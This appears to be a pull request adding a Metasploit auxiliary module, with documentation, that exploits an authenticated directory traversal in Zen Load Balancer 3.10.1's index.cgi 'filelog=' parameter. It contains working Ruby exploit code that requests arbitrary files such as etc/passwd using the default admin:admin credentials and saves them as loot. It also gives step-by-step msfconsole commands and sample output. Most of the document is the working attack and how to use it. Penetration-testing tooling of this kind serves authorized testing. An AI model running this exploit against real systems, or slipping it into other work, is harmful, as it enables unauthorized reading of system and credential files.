### PR TITLE
Zen Load Balancer 3.10.1 - 'index.cgi' Directory Traversal

### DIFF
--- a/documentation/modules/auxiliary/scanner/http/zenload_balancer_traversal.md
+++ b/documentation/modules/auxiliary/scanner/http/zenload_balancer_traversal.md
@@ -1,0 +1,34 @@
+## Description
+
+Zen load balancer before v3.10.1 is vulnerable to authenticated directory traversal. The flaw exists in 'index.cgi' not properly handling 'filelog=' parameter which allows a malicious actor to load arbitrary file path.
+
+## Vulnerable Application
+
+[Vulnerable ISO](https://sourceforge.net/projects/zenloadbalancer/files/Distro/zenloadbalancer-distro_3.10.1.iso/download)
+
+## Verification Steps
+
+1. `./msfconsole -q`
+2. `set RHOSTS <rhost>`
+3. `set RPORT <rport>`
+4. `set FILEPATH <filepath>`
+5. `set ssl <true/false>`
+6. `set HttpPassword <admin>`
+7. `set HttpUsername <admin>`
+5. `run`
+
+## Scenarios
+
+```
+msf5 > use auxiliary/scanner/http/zenload_balancer_traversal 
+msf5 auxiliary(scanner/http/zenload_balancer_traversal) > set RHOSTS 192.168.1.101
+RHOSTS => 192.168.1.101
+msf5 auxiliary(scanner/http/zenload_balancer_traversal) > set SSL true 
+SSL => true
+msf5 auxiliary(scanner/http/zenload_balancer_traversal) > run
+[*] Running module against 192.168.1.101
+
+[+] File saved in: /Users/Dhiraj/.msf4/loot/20200412142620_default_192.168.1.101_zenload.http_196293.txt
+[*] Auxiliary module execution completed
+msf5 auxiliary(scanner/http/zenload_balancer_traversal) >
+```

--- a/modules/auxiliary/scanner/http/zenload_balancer_traversal.rb
+++ b/modules/auxiliary/scanner/http/zenload_balancer_traversal.rb
@@ -1,0 +1,81 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Auxiliary::Report
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Zen Load Balancer Directory Traversal",
+      'Description'    => %q{
+          This module exploits a authenticated directory traversal vulnerability in zen load
+          balancer v3.10.1. The flaw exists in 'index.cgi' not properly handling 'filelog='
+          parameter which allows a malicious actor to load arbitrary file path.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Basim Alabdullah', # Vulnerability discovery
+          'Dhiraj Mishra'     # Metasploit module
+        ],
+      'References'     =>
+        [
+          ['EDB', '48308']
+        ],
+      'DisclosureDate' => "Apr 10 2020"
+    ))
+
+    register_options(
+      [
+        Opt::RPORT(444),
+        OptInt.new('DEPTH', [true, 'The max traversal depth', 16]),
+        OptString.new('FILEPATH', [false, 'The name of the file to download', 'etc/passwd']),
+        OptString.new('HttpUsername', [true, 'The username to use for the HTTP server', 'admin']),
+        OptString.new('HttpPassword', [false, 'The password to use for the HTTP server', 'admin']),
+      ])
+  end
+
+  def run
+    if datastore['FILEPATH'].nil? or datastore['FILEPATH'].empty?
+      print_error("Please supply the name of the file you want to download")
+      return
+    end
+
+    traversal = "../" * datastore['DEPTH']
+    begin
+      res = send_request_raw({
+        'method' => 'GET',
+        'uri'    => "/index.cgi?id=2-3&filelog=#{traversal}#{datastore['FILEPATH']}&nlines=100&action=See+logs",
+        'authorization' => basic_auth(datastore['HttpUsername'],datastore['HttpPassword'])
+      }, 25)
+    rescue Rex::ConnectionRefused
+      print_error("#{rhost}:#{rport} Could not connect.")
+      return
+    end
+
+    if res
+      if res.code == 200
+        vprint_line(res.to_s)
+        fname = File.basename(datastore['FILEPATH'])
+
+        path = store_loot(
+          'zenload.http',
+          'text/plain',
+          datastore['RHOST'],
+          res.body,
+          fname
+        )
+        print_good("File saved in: #{path}")
+      elsif res.code == 401
+        print_error("#{rhost}:#{rport} Authentication failed")
+      elsif res.code == 404
+        print_error("#{rhost}:#{rport} File not found")
+      end
+    else
+      print_error("HTTP Response failed")
+    end
+  end
+end

--- a/modules/auxiliary/scanner/http/zenload_balancer_traversal.rb
+++ b/modules/auxiliary/scanner/http/zenload_balancer_traversal.rb
@@ -39,7 +39,7 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def run
-    if datastore['FILEPATH'].nil? or datastore['FILEPATH'].empty?
+    if datastore['FILEPATH'].nil? || datastore['FILEPATH'].empty?
       print_error("Please supply the name of the file you want to download")
       return
     end

--- a/modules/auxiliary/scanner/http/zenload_balancer_traversal.rb
+++ b/modules/auxiliary/scanner/http/zenload_balancer_traversal.rb
@@ -11,8 +11,8 @@ class MetasploitModule < Msf::Auxiliary
     super(update_info(info,
       'Name'           => "Zen Load Balancer Directory Traversal",
       'Description'    => %q{
-          This module exploits a authenticated directory traversal vulnerability in zen load
-          balancer v3.10.1. The flaw exists in 'index.cgi' not properly handling 'filelog='
+          This module exploits a authenticated directory traversal vulnerability in Zen Load
+          Balancer `v3.10.1`. The flaw exists in 'index.cgi' not properly handling 'filelog='
           parameter which allows a malicious actor to load arbitrary file path.
       },
       'License'        => MSF_LICENSE,
@@ -33,6 +33,7 @@ class MetasploitModule < Msf::Auxiliary
         Opt::RPORT(444),
         OptInt.new('DEPTH', [true, 'The max traversal depth', 16]),
         OptString.new('FILEPATH', [false, 'The name of the file to download', 'etc/passwd']),
+        OptString.new('TARGETURI', [true, "The base URI path of the ZenConsole install", '/']),
         OptString.new('HttpUsername', [true, 'The username to use for the HTTP server', 'admin']),
         OptString.new('HttpPassword', [false, 'The password to use for the HTTP server', 'admin']),
       ])


### PR DESCRIPTION
## Summary
```
This module exploits a authenticated directory traversal vulnerability in zen load 
balancer v3.10.1. The flaw exists in 'index.cgi' not properly handling 'filelog=' 
parameter which allows a malicious actor to load arbitrary file path.
```

## Verification
```
# msfconsole
msf5> use auxiliary/scanner/http/zenload_balancer_traversal 
msf5> set RHOSTS 192.168.1.101
msf5> set RPORT 444
msf5> set FILEPATH etc/passwd
msf5> set SSL true
msf5> set HttpPassword admin
msf5> set HttpUsername admin
msf5> run
```
As per the documentation to access the administration panel of zen load balancer the default username and password is `admin:admin`

**Reference:** https://www.zevenet.com/knowledge-base/community-edition/community-edition-v3-05-administration-guide/community-edition-v3-05-access-to-zen-load-balacer-web-administration-panel/